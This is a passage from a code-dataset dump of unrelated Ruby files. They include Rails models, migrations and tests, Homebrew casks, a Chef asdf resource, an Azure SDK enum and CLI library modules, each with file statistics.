is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 31.861244 | 257 | 0.64319 |
e888405015226f071e0a0ceb1ab67fc5826ddad7 | 899 | unless ENV['RAILS_ENV'] == "production"
namespace :spec do
desc 'Run small specs (lib, model, controller)'
task :small => %w[spec:lib spec:models spec:controllers]
desc 'Run large specs (requests).'
task :large => %w[spec:requests]
desc 'Run all specs (including buster).'
task :all => %w[spec js:test]
namespace :coverage do
desc "Make sure test coverage doesn't drop below THRESHOLD"
task :ensure do
require 'json'
threshold = Float(ENV['COVERAGE_THRESHOLD'] || ENV['THRESHOLD'] || 80)
path = Rails.root.join("coverage/.last_run.json")
data = JSON.parse File.read(path)
covered = data.fetch('result').fetch('covered_percent')
if covered < threshold
raise "Test coverage #{covered}% is below the threshold of #{threshold}%. Not good enough, sorry."
end
end
end
end
end
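# Example invocation (a sketch; assumes these tasks are loaded from the app's
# Rakefile and that SimpleCov has already written coverage/.last_run.json):
#
#   COVERAGE_THRESHOLD=90 bundle exec rake spec:coverage:ensure
#
# with coverage/.last_run.json shaped like:
#
#   {"result":{"covered_percent":84.5}}
#
# which would raise here, since 84.5 is below the 90% threshold.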
| 29 | 108 | 0.626251 |
790373de98c27512dc1d0b56d96238b5f61fe77d | 572 | Pod::Spec.new do |spec|
spec.name = "Every.swift"
spec.version = "1.0.0"
spec.summary = "An Swift wrapper for NSTimer"
spec.homepage = "https://github.com/samhann/Every.swift"
spec.license = { type: 'MIT', file: 'LICENSE' }
spec.authors = { "Samhan" => 'pickledbrains+pods@gmail.com' }
spec.social_media_url = "http://twitter.com/samhanknr"
spec.platform = :ios, "8.0"
spec.requires_arc = true
spec.source = { git: "https://github.com/samhann/Every.swift.git", tag: "v#{spec.version}", submodules: true }
spec.source_files = "src/**/*.{h,swift}"
end | 40.857143 | 112 | 0.666084 |
bb8c5f9616f9b568636ab2caadb643cd8acd99d0 | 585 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Web::Mgmt::V2020_09_01
module Models
#
# Defines values for SkuName
#
module SkuName
Free = "Free"
Shared = "Shared"
Basic = "Basic"
Standard = "Standard"
Premium = "Premium"
Dynamic = "Dynamic"
Isolated = "Isolated"
PremiumV2 = "PremiumV2"
ElasticPremium = "ElasticPremium"
ElasticIsolated = "ElasticIsolated"
end
end
end
| 23.4 | 70 | 0.644444 |
1a8d4ec553e92115762cb5719c225cb997a34d62 | 121 | class AddCollumToSearches < ActiveRecord::Migration
def change
add_column :searches, :image_url, :string
end
end
| 20.166667 | 51 | 0.768595 |
08d445871d8577008f01fa0752ff21351af86fdc | 47 | module Cronofy
VERSION = "0.37.7".freeze
end
| 11.75 | 27 | 0.702128 |
2656cafeeeb89631bba9b6fe7d051933c3fe7f82 | 359 | class CreatePrsAccounts < ActiveRecord::Migration[6.1]
def change
create_table :prs_accounts do |t|
t.belongs_to :user
t.string :account
t.string :status
t.string :public_key
t.string :encrypted_private_key
t.jsonb :keystore
t.timestamps
end
add_index :prs_accounts, :account, unique: true
end
end
| 19.944444 | 54 | 0.668524 |
f7aae90d8ee136611b562b16704042fce5cfdfe8 | 677 | class Micropost < ApplicationRecord
belongs_to :user
has_many :likes, dependent: :destroy
default_scope -> {order(created_at: :desc)}
mount_uploader :picture, PictureUploader
validates :user_id, presence: true
validates :content, presence: true, length: { maximum: 140 }
validate :picture_size
def self.search(search)
if search
where(['content LIKE ?', "%#{search}%"])
else
all
end
end
def like_user(user_id)
likes.find_by(user_id: user_id)
end
private
# Validate the size of an uploaded picture
def picture_size
if picture.size > 2.megabytes
errors.add(:picture, "should be less then 2MB")
end
end
end
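# Console sketch (illustrative; assumes the surrounding Rails app with its User
# and Like models, and that `post` and `current_user` are existing records):
#
#   Micropost.search("hello")        # => microposts whose content matches %hello%
#   Micropost.search(nil)            # => Micropost.all, newest first (default_scope)
#   post.like_user(current_user.id)  # => the Like record, or nil if not yet liked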
| 21.15625 | 59 | 0.676514 |
331e8b779540b3fa8b7fdf79767efc1cae4e06e2 | 2,961 | require "spec_helper"
RSpec.describe IEXCloud::Response do
let(:raw_response) { double(status: 200, body: "OK") }
subject(:response) { described_class.new(raw_response) }
describe "#initialize" do
it "assigns the raw_response" do
expect(response.raw_response).to eq raw_response
end
end
describe "#status" do
it "delegates to the raw response" do
expect(response.status).to eq raw_response.status
end
end
describe "#body" do
it "delegates to the raw response" do
expect(response.body).to eq raw_response.body
end
end
describe "#success?" do
subject { response.success? }
context "when the status is 200" do
it { is_expected.to be true }
end
context "when the status is anything else" do
let(:raw_response) { double(status: 401) }
it { is_expected.to be false }
end
end
describe "#on_error" do
subject(:on_error) { response.on_error }
it { is_expected.to eq response }
context "when request is a success" do
it "does nothing" do
expect { |b| response.on_error(&b) }.not_to yield_control
end
end
context "when request has an error" do
it "yields to the associated block" do
allow(response).to receive(:success?).and_return(false)
expect { |b| response.on_error(&b) }.to yield_control
end
end
end
describe "#raise_errors" do
subject { response.raise_errors }
let(:raw_response) { double(status: status, body: { "exception" => { "message" => "Error message" } }) }
context "when the status is 400" do
let(:status) { 400 }
it "raises an InvalidRequest error" do
expect { subject }.to raise_error(IEXCloud::InvalidRequest)
end
end
context "when the status is 401" do
let(:status) { 401 }
it "raises an AccessDenied error" do
expect { subject }.to raise_error(IEXCloud::AccessDenied)
end
end
context "when the status is 403" do
let(:status) { 403 }
it "raises an InvalidAuth error" do
expect { subject }.to raise_error(IEXCloud::InvalidAuth)
end
end
context "when the status is 404" do
let(:status) { 404 }
it "raises a ResourceNotFound error" do
expect { subject }.to raise_error(IEXCloud::ResourceNotFound)
end
end
context "when the status is 405" do
let(:status) { 405 }
it "raises a MethodNotAllowed error" do
expect { subject }.to raise_error(IEXCloud::MethodNotAllowed)
end
end
context "when the status is 400 through 499" do
let(:status) { 402 }
it "raises a ServiceError" do
expect { subject }.to raise_error(IEXCloud::ServiceError)
end
end
context "when the status is 500 through 599" do
let(:status) { 555 }
it "raises a ServerError" do
expect { subject }.to raise_error(IEXCloud::ServerError)
end
end
end
end
| 25.973684 | 108 | 0.638298 |
11642ea5e11df062045e8ad9b2f9a209cd8ac02f | 2,221 | # -*- coding: utf-8 -*-
# Copyright (C) 2010-2011, 2015 Rocky Bernstein <rockyb@rubyforge.net>
require_relative '../base/subcmd'
class Trepan::Subcommand::SetDifferent < Trepan::SetBoolSubcommand
unless defined?(HELP)
Trepanning::Subcommand.set_name_prefix(__FILE__, self)
HELP = <<-EOH
**#{PREFIX.join(' ')}** [**on**|**off**|**nostack**]
Set to make sure `next` or `step` moves to a new position.
Due to the interpretive, expression-oriented nature of the Ruby
Language and implementation, each line often may contain many possible
stopping points with possibly different event type. In a debugger it
is sometimes desirable to continue but stop only when the position
next changes.
Setting to "different" to on will cause each `step` or `next` command to
stop at a different position.
Note though that the notion of different does take into account stack
nesting. So in `ARGV.map {|arg| arg.to_i}`, you get a stop before
*ARGV* as well as one in the block as well as before to call to
*to_i*.
If you want to ignore stopping at added nesting levels, there are two
possibilities. `set step nostack` will ignore stack nesting levels on
a given line. Also you can use 'next', but that also skips stepping
into functions.
See also:
---------
The debugger commands `step` and `next` have suffixes '+' and '-' which
override this setting.
EOH
IN_LIST = true
MIN_ABBREV = 'dif'.size
SHORT_HELP = "Set to make sure 'next/step' move to a new position."
end
completion %w(on off nostack)
def run(args)
if args.size == 3 && 'nostack' == args[2]
@proc.settings[:different] = 'nostack'
msg("different is nostack.")
else
super
end
@proc.different_pos = @proc.settings[:different]
end
end
if __FILE__ == $0
# Demo it.
require_relative '../../mock'
name = File.basename(__FILE__, '.rb')
# FIXME: DRY the below code
dbgr, cmd = MockDebugger::setup('set')
subcommand = Trepan::Subcommand::SetDifferent.new(cmd)
testcmdMgr = Trepan::Subcmd.new(subcommand)
subcommand.run_show_bool
# subcommand.summary_help(name)
puts
puts '-' * 20
puts subcommand.save_command
end
| 30.013514 | 73 | 0.684376 |
33a8372e384bde5fc0630b940a2dd059d1bd89a7 | 435 | Rails.application.routes.draw do
root to: 'welcome#index'
get '/oauth2-callback', to: 'o_auth#oauth_callback'
get '/logout', to: 'o_auth#logout'
get '/login', to: 'o_auth#login'
get '/register', to: 'o_auth#register'
post '/registration_webhook', to: 'registration_webhook#handle_registration'
get '/verify', to: 'verify#index'
get '/verify_success', to: 'verify#success'
post '/verify', to: 'verify#check_code'
end
| 33.461538 | 78 | 0.703448 |
87691b8d1d9bf6199ab943e6aad265b7ba08b775 | 1,603 | require 'test_helper'
class FollowingTest < ActionDispatch::IntegrationTest
def setup
@user = users(:michael)
@other = users(:archer)
log_in_as(@user)
end
test "following page do" do
get following_user_path(@user)
assert_not @user.following.empty?
assert_match @user.following.count.to_s, response.body
@user.following.each do |user|
assert_select "a[href=?]", user_path(user)
end
end
test "followers page" do
get followers_user_path(@user)
assert_not @user.followers.empty?
assert_match @user.followers.count.to_s, response.body
@user.followers.each do |user|
assert_select "a[href=?]", user_path(user)
end
end
test "should follow a user the standard way" do
assert_difference '@user.following.count', 1 do
post relationships_path, params: {followed_id: @other.id}
end
end
test "should follow a user with Ajax" do
assert_difference '@user.following.count', 1 do
post relationships_path, xhr:true, params: { followed_id: @other.id}
end
end
test "should unfollow a user the standard way" do
@user.follow(@other)
relationship = @user.active_relationships.find_by(followed_id: @other.id)
assert_difference '@user.following.count', -1 do
delete relationship_path(relationship)
end
end
test "should unfollow a user with Ajax" do
@user.follow(@other)
relationship = @user.active_relationships.find_by(followed_id: @other.id)
assert_difference '@user.following.count', -1 do
delete relationship_path(relationship), xhr: true
end
end
end
| 28.122807 | 77 | 0.703681 |
7a2290f1f0323bfe9676e12d45b53ee2c348c60d | 606 | cask 'principle' do
version '0.0.81'
sha256 '640afca3255a5e1938bf53e4944f37a8116898a4de873a6fdad4e4322a6ddbd7'
# dropboxusercontent.com is the official download host per the vendor homepage
url "https://dl.dropboxusercontent.com/u/13897407/Principle_#{version.dots_to_underscores}.zip"
appcast 'https://dl.dropboxusercontent.com/u/13897407/buildTrain-601A6666-57A4-4C19-BDD3-1387B3CB9719.xml',
:checkpoint => '19d2ed17922df59075a92e5b8773ea28f781127f916a3e93027d1b76645c46bf'
name 'Principle'
homepage 'http://principleformac.com/'
license :commercial
app 'Principle.app'
end
| 40.4 | 109 | 0.79538 |
bb7ae74d1ac25550a969d3a3770f18698548dc38 | 6,007 | # -*- encoding: utf-8; frozen_string_literal: true -*-
#
#--
# This file is part of HexaPDF.
#
# HexaPDF - A Versatile PDF Creation and Manipulation Library For Ruby
# Copyright (C) 2014-2019 Thomas Leitner
#
# HexaPDF is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License version 3 as
# published by the Free Software Foundation with the addition of the
# following permission added to Section 15 as permitted in Section 7(a):
# FOR ANY PART OF THE COVERED WORK IN WHICH THE COPYRIGHT IS OWNED BY
# THOMAS LEITNER, THOMAS LEITNER DISCLAIMS THE WARRANTY OF NON
# INFRINGEMENT OF THIRD PARTY RIGHTS.
#
# HexaPDF is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public
# License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with HexaPDF. If not, see <http://www.gnu.org/licenses/>.
#
# The interactive user interfaces in modified source and object code
# versions of HexaPDF must display Appropriate Legal Notices, as required
# under Section 5 of the GNU Affero General Public License version 3.
#
# In accordance with Section 7(b) of the GNU Affero General Public
# License, a covered work must retain the producer line in every PDF that
# is created or manipulated using HexaPDF.
#
# If the GNU Affero General Public License doesn't fit your need,
# commercial licenses are available at <https://gettalong.at/hexapdf/>.
#++
require 'hexapdf/font/cmap'
module HexaPDF
module Font
class CMap
# Creates a CMap file.
#
# Currently only ToUnicode CMaps are supported.
class Writer
# Maximum number of entries in one section.
MAX_ENTRIES_IN_SECTION = 100
# Returns a ToUnicode CMap for the given input code to Unicode codepoint mapping which needs
# to be sorted by input codes.
#
# Note that the returned CMap always uses a 16-bit input code space!
def create_to_unicode_cmap(mapping)
return to_unicode_template % '' if mapping.empty?
chars, ranges = compute_section_entries(mapping)
result = create_sections("bfchar", chars.size / 2) do |index|
index *= 2
sprintf("<%04X>", chars[index]) << "<" <<
((+'').force_encoding(::Encoding::UTF_16BE) << chars[index + 1]).unpack1('H*') <<
">\n"
end
result << create_sections("bfrange", ranges.size / 3) do |index|
index *= 3
sprintf("<%04X><%04X>", ranges[index], ranges[index + 1]) << "<" <<
((+'').force_encoding(::Encoding::UTF_16BE) << ranges[index + 2]).unpack1('H*') <<
">\n"
end
to_unicode_template % result.chop!
end
private
# Computes the entries for the "char" and "range" sections based on the given mapping.
#
# Returns two arrays +char_mappings+ and +range_mappings+ where +char_mappings+ is an array
# of the form
#
# [code1, value1, code2, value2, ...]
#
# and +range_mappings+ an array of the form
#
# [start1, end1, value1, start2, end2, value2, ...]
def compute_section_entries(mapping)
chars = []
ranges = []
last_code, last_value = *mapping[0]
is_range = false
mapping.slice(1..-1).each do |code, value|
if last_code + 1 == code && last_value + 1 == value && code % 256 != 0
ranges << last_code << nil << last_value unless is_range
is_range = true
elsif is_range
ranges[-2] = last_code
is_range = false
else
chars << last_code << last_value
end
last_code = code
last_value = value
end
# Handle last remaining mapping
if is_range
ranges[-2] = last_code
else
chars << last_code << last_value
end
[chars, ranges]
end
# Creates one or more sections of a CMap file and returns the resulting string.
#
# +type+::
# The name of the section, e.g. "bfchar" or "bfrange".
#
# +size+::
# The maximum number of elements of this type. Used for determining when to start a new
# section.
#
# The method makes sure that no section has more than the maximum number of allowed entries.
#
# Numbers from 0 up to size - 1 are yielded, indicating the current entry that should be
# processed and for which an appropriate section line should be returned from the block.
def create_sections(type, size)
return +'' if size == 0
result = +""
index = 0
while size > 0
count = [MAX_ENTRIES_IN_SECTION, size].min
result << "#{count} begin#{type}\n"
index.upto(index + count - 1) {|i| result << yield(i) }
result << "end#{type}\n"
index += count
size -= count
end
result
end
# Returns the CMap file template for a ToUnicode CMap.
def to_unicode_template
<<~TEMPLATE
/CIDInit /ProcSet findresource begin
12 dict begin
begincmap
/CIDSystemInfo
<< /Registry (Adobe)
/Ordering (UCS)
/Supplement 0
>> def
/CMapName /Adobe-Identity-UCS def
/CMapType 2 def
1 begincodespacerange
<0000> <FFFF>
endcodespacerange
%s
endcmap
CMapName currentdict /CMap defineresource pop
end
end
TEMPLATE
end
end
end
end
end
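if __FILE__ == $0
  # Small demonstration, guarded so it only runs when this file is executed
  # directly. It assumes the hexapdf gem is installed so the `require` above
  # succeeds. The mapping pairs are [input code, Unicode codepoint], sorted by
  # input code as #create_to_unicode_cmap requires; the values are arbitrary.
  mapping = [[0x20, 0x0020], [0x21, 0x0021], [0x22, 0x0041]]
  puts HexaPDF::Font::CMap::Writer.new.create_to_unicode_cmap(mapping)
end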
| 33.747191 | 100 | 0.589978 |
bb26930d7eba602534e4879805961898db6066a1 | 320 | # frozen_string_literal: true
require 'test/unit'
require_relative 'test-helper'
class TestHeartbeat < Test::Unit::TestCase
def test_heartbeat
res = $bien_conn.get '/heartbeat'
assert_instance_of(Faraday::Response, res)
assert_equal(200, res.status)
assert_instance_of(String, res.body)
end
end
| 18.823529 | 46 | 0.74375 |
eda73c3743677b9313e09187b66218b3fbc1b6f7 | 124 | module FeishuBot
class ApplicationController < ActionController::Base
protect_from_forgery with: :exception
end
end
| 20.666667 | 54 | 0.806452 |
ab79ee0c0186e4e3c7159ea6599181f49a534cbe | 1,135 | cask 'unity-facebook-games-support-for-editor@2018.2.0b3' do
version '2018.2.0b3,0a6b93065060'
sha256 :no_check
url "http://beta.unity3d.com/download/0a6b93065060/MacEditorTargetInstaller/UnitySetup-Facebook-Games-Support-for-Editor-2018.2.0b3.pkg"
name 'Facebook Gameroom Build Support'
homepage 'https://unity3d.com/unity/'
pkg 'UnitySetup-Facebook-Games-Support-for-Editor-2018.2.0b3.pkg'
depends_on cask: 'unity@2018.2.0b3'
preflight do
if File.exist? "/Applications/Unity"
FileUtils.move "/Applications/Unity", "/Applications/Unity.temp"
end
if File.exist? "/Applications/Unity-2018.2.0b3"
FileUtils.move "/Applications/Unity-2018.2.0b3", '/Applications/Unity'
end
end
postflight do
if File.exist? '/Applications/Unity'
FileUtils.move '/Applications/Unity', "/Applications/Unity-2018.2.0b3"
end
if File.exist? '/Applications/Unity.temp'
FileUtils.move '/Applications/Unity.temp', '/Applications/Unity'
end
end
uninstall quit: 'com.unity3d.UnityEditor5.x',
delete: '/Applications/Unity-2018.2.0b3/PlaybackEngines/Facebook'
end
| 31.527778 | 138 | 0.717181 |
d525143c101d876294a487f2e9aad77ad4ded4bd | 143 | # typed: strict
# frozen_string_literal: true
module Calificador
module Context
class ConditionContext < BasicContext
end
end
end
| 14.3 | 41 | 0.755245 |
5df349a5a1fe94b2506a9bbf28f8322b3e783ba8 | 2,115 | require './test/test_helper'
# Essentialy the same as test_threading.rb but with an expanded pool for
# testing multiple connections.
class TestThreadingLargePool < Test::Unit::TestCase
include Mongo
@@db = standard_connection(:pool_size => 50, :timeout => 60).db(MONGO_TEST_DB)
@@coll = @@db.collection('thread-test-collection')
def set_up_safe_data
@@db.drop_collection('duplicate')
@@db.drop_collection('unique')
@duplicate = @@db.collection('duplicate')
@unique = @@db.collection('unique')
@duplicate.insert("test" => "insert")
@duplicate.insert("test" => "update")
@unique.insert("test" => "insert")
@unique.insert("test" => "update")
@unique.create_index("test", :unique => true)
end
def test_safe_update
set_up_safe_data
threads = []
300.times do |i|
threads[i] = Thread.new do
if i % 2 == 0
assert_raise Mongo::OperationFailure do
@unique.update({"test" => "insert"}, {"$set" => {"test" => "update"}}, :safe => true)
end
else
@duplicate.update({"test" => "insert"}, {"$set" => {"test" => "update"}}, :safe => true)
end
end
end
300.times do |i|
threads[i].join
end
end
def test_safe_insert
set_up_safe_data
threads = []
300.times do |i|
threads[i] = Thread.new do
if i % 2 == 0
assert_raise Mongo::OperationFailure do
@unique.insert({"test" => "insert"}, :safe => true)
end
else
@duplicate.insert({"test" => "insert"}, :safe => true)
end
end
end
300.times do |i|
threads[i].join
end
end
def test_threading
@@coll.drop
@@coll = @@db.collection('thread-test-collection')
1000.times do |i|
@@coll.insert("x" => i)
end
threads = []
10.times do |i|
threads[i] = Thread.new do
sum = 0
@@coll.find().each do |document|
sum += document["x"]
end
assert_equal 499500, sum
end
end
10.times do |i|
threads[i].join
end
end
end
| 23.241758 | 98 | 0.564539 |
398cbd98a9ec51ba2f45b3370bc538197a212887 | 573 | class Api::UsersController < ApplicationController
def index
@users = User.all
render json: @users
end
def show
@user = User.includes(:submitted_responses, polls: [answers: :responses]).find(params[:id])
render :show
end
def create
@user = User.new(user_params)
if @user.save
sign_in!(@user)
render :show
else
render json: @user.errors.full_messages, status: :unprocessable_entity
end
end
protected
def user_params
params.require(:user).permit(:first_name, :last_name, :email, :password)
end
end
| 19.758621 | 95 | 0.671902 |
79148e98be816e6f5d4bd4b39a6016f786e54f58 | 251 | class CreateYearStatistics < ActiveRecord::Migration
def change
create_table :year_statistics do |t|
t.integer :user_id
t.integer :year
t.json :data
t.timestamps
end
add_index :year_statistics, :user_id
end
end
| 20.916667 | 52 | 0.685259 |
ac8396e6e79dce6ab4a6a1a185f005e4e41b8a67 | 3,789 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Attempt to read encrypted secrets from `config/secrets.yml.enc`.
# Requires an encryption key in `ENV["RAILS_MASTER_KEY"]` or
# `config/secrets.yml.key`.
config.read_encrypted_secrets = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
# config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
# config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "hub_#{Rails.env}"
# config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
# config.active_record.dump_schema_after_migration = false
end
| 41.184783 | 102 | 0.75508 |
e2a9ad69cc8a9f8c7ef4f8e91a4191d459c82599 | 446 | require "rubygems"
require "sass"
require "compass"
DEFAULT_FRAMEWORKS = ["compass", "blueprint"]
ARGV.each do |arg|
next if arg == "compass"
next if arg == "blueprint"
require arg
end
Compass::Frameworks::ALL.each do |framework|
next if framework.name =~ /^_/
next if DEFAULT_FRAMEWORKS.include?(framework.name) && !ARGV.include?(framework.name)
print "#{File.expand_path(framework.stylesheets_directory)}\n"
end
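# Example invocation (a sketch; the script name and gem name are illustrative
# placeholders):
#
#   ruby frameworks.rb susy
#
# requires the named gem, then prints the stylesheets directory of every
# registered framework, skipping the bundled compass/blueprint frameworks
# unless they are named explicitly on the command line.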
| 24.777778 | 88 | 0.697309 |
b92b2da2f21d5610783e37e0709ced134c7db0c4 | 183 | class Post < ActiveRecord::Base
belongs_to :user
has_and_belongs_to_many :tags
has_many :comments
validates :title, :presence => true
validates :body, :presence => true
end
| 22.875 | 37 | 0.743169 |
6af22e7263d5abcbc846000369224112fef94e85 | 1,564 | ##
# This is the controller that allows managing the access groups used for authorizing access to resources.
#
class AccessGroupsController < ApplicationController
before_action :validate_user
before_action :set_access_group, only: [:show, :edit, :update, :destroy]
##
# GET /access_groups
def index
@access_groups = AccessGroup.all.sorted
end
##
# GET /access_groups/1
def show
end
##
# GET /access_groups/new
def new
@access_group = AccessGroup.new
end
##
# GET /access_groups/1/edit
def edit
end
##
# POST /access_groups
def create
@access_group = AccessGroup.new(access_group_params)
if @access_group.save
redirect_to access_groups_url, notice: 'Access group was successfully created.'
else
render :new
end
end
##
# PATCH/PUT /access_groups/1
def update
if @access_group.update(access_group_params)
redirect_to access_groups_url, notice: 'Access group was successfully updated.'
else
render :edit
end
end
##
# DELETE /access_groups/1
def destroy
@access_group.destroy
redirect_to access_groups_url, notice: 'Access group was successfully destroyed.'
end
private
def validate_user
authorize! true
end
# Use callbacks to share common setup or constraints between actions.
def set_access_group
@access_group = AccessGroup.find(params[:id])
end
# Only allow a trusted parameter "white list" through.
def access_group_params
params.require(:access_group).permit(:name, :ldap_group_list)
end
end
| 20.853333 | 105 | 0.711637 |
62cdbde2a5a0e308ae86876f94bcc2d632b3901a | 1,321 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-backup/types'
require_relative 'aws-sdk-backup/client_api'
require_relative 'aws-sdk-backup/client'
require_relative 'aws-sdk-backup/errors'
require_relative 'aws-sdk-backup/resource'
require_relative 'aws-sdk-backup/customizations'
# This module provides support for AWS Backup. This module is available in the
# `aws-sdk-backup` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# backup = Aws::Backup::Client.new
# resp = backup.create_backup_plan(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from AWS Backup are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::Backup::Errors::ServiceError
# # rescues all AWS Backup API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::Backup
GEM_VERSION = '1.44.0'
end
| 24.462963 | 78 | 0.735049 |
5d0085ef0889fdc58dddd184f3d09d13862e85dd | 2,165 | # frozen_string_literal: true
#
# Cookbook:: asdf
# Resource:: script
#
# Copyright:: 2017, Fernando Aleman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
provides :asdf_script
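# Illustrative usage in a recipe (a sketch, not taken from this cookbook's
# documentation; the user name, plugin and version values are hypothetical):
#
#   asdf_script 'install ruby' do
#     user 'deploy'
#     code 'asdf install ruby 2.6.3'
#   end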
property :user, String, required: true
property :code, String, required: true
property :group, String, default: lazy { user }
property :cwd, String, default: lazy { ::File.expand_path("~#{user}") }
property :creates, String
property :path, Array
property :environment, Hash
property :returns, Array, default: [0]
property :timeout, Integer
property :umask, [String, Integer]
property :live_stream, [true, false], default: false
action :run do
bash new_resource.name do
user new_resource.user
code script_code
group new_resource.group
cwd new_resource.cwd
creates new_resource.creates if new_resource.creates
environment(script_environment)
returns new_resource.returns
timeout new_resource.timeout if new_resource.timeout
umask new_resource.umask if new_resource.umask
live_stream new_resource.live_stream
end
end
action_class do
include Chef::Asdf::ScriptHelpers
def script_code
script = []
script << %(export PATH="#{asdf_path}/bin:$PATH")
script << %(source /etc/profile.d/asdf.sh)
script << new_resource.code
script.join("\n").concat("\n")
end
def script_environment
script_env = {}
script_env.merge!(new_resource.environment) if new_resource.environment
if new_resource.path
script_env['PATH'] = "#{new_resource.path.join(':')}:#{ENV['PATH']}"
end
script_env['USER'] = new_resource.user
script_env['HOME'] = ::File.expand_path("~#{new_resource.user}")
script_env
end
end
| 29.256757 | 74 | 0.728868 |
4a4168fbff6cdcc214d1d9fd20bba7f33a986f47 | 356 | Sequel.migration do
change do
create_table :reg_0305 do
column :id, Integer, primary_key: true
column :id_pai, Integer, index: true, null: false
column :cod_ccus, String, size: 60
column :func, String, size: 1000
column :vida_util, String, size: 3
column :cnpj_pai, String, size: 14, index: true
end
end
end
| 27.384615 | 55 | 0.657303 |
1cb490bdafe9efc31edca5dde3775cf08a60bced | 2,029 | require 'clamp/errors'
require 'clamp/subcommand/definition'
module Clamp
module Subcommand
module Declaration
def recognised_subcommands
@recognised_subcommands ||= []
end
def subcommand(name, description, subcommand_class = self, &block)
unless has_subcommands?
@subcommand_parameter = if @default_subcommand
parameter "[SUBCOMMAND]", "subcommand", :attribute_name => :subcommand_name, :default => @default_subcommand
else
parameter "SUBCOMMAND", "subcommand", :attribute_name => :subcommand_name, :required => false
end
remove_method :default_subcommand_name
parameter "[ARG] ...", "subcommand arguments", :attribute_name => :subcommand_arguments
end
if block
# generate an anonymous sub-class
subcommand_class = Class.new(subcommand_class, &block)
end
recognised_subcommands << Subcommand::Definition.new(name, description, subcommand_class)
end
def has_subcommands?
!recognised_subcommands.empty?
end
def find_subcommand(name)
recognised_subcommands.find { |sc| sc.is_called?(name) }
end
def parameters_before_subcommand
parameters.take_while { |p| p != @subcommand_parameter }
end
def inheritable_attributes
recognised_options + parameters_before_subcommand
end
def default_subcommand=(name)
if has_subcommands?
raise Clamp::DeclarationError, "default_subcommand must be defined before subcommands"
end
@default_subcommand = name
end
def default_subcommand(*args, &block)
if args.empty?
@default_subcommand
else
$stderr.puts "WARNING: Clamp default_subcommand syntax has changed; check the README."
$stderr.puts " (from #{caller.first})"
self.default_subcommand = args.first
subcommand(*args, &block)
end
end
end
end
end
| 29.838235 | 120 | 0.648595 |
